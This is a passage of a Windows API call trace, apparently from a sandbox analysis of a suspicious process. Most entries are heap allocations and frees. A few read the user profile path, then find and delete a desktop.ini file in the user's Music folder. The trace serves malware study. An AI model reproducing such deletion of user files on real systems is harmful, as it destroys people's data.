Flags=0x0, Size=0x10) returned 0x2e50d28 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0244.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0244.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.765] CloseHandle (hObject=0x2a0) returned 1 [0244.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0244.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0244.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0244.768] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0244.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0244.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0244.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0244.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0244.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.769] CloseHandle (hObject=0x2d0) returned 1 [0244.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0244.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0244.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0244.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0244.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0244.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0244.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0244.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0244.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0244.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0244.777] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0244.777] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0244.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0244.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0244.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0244.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0244.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e58910 [0244.778] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x21 [0244.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0244.778] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini")) returned 0x26 [0244.778] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87050 [0244.778] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini")) returned 1 [0244.780] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0244.780] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0244.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0244.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0244.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0244.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0244.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.780] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0244.780] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0244.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0244.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0244.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0244.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0244.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0244.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0244.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0244.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e58910 [0244.781] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x21 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0244.781] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini")) returned 0xffffffff [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0244.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0244.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0244.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0244.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 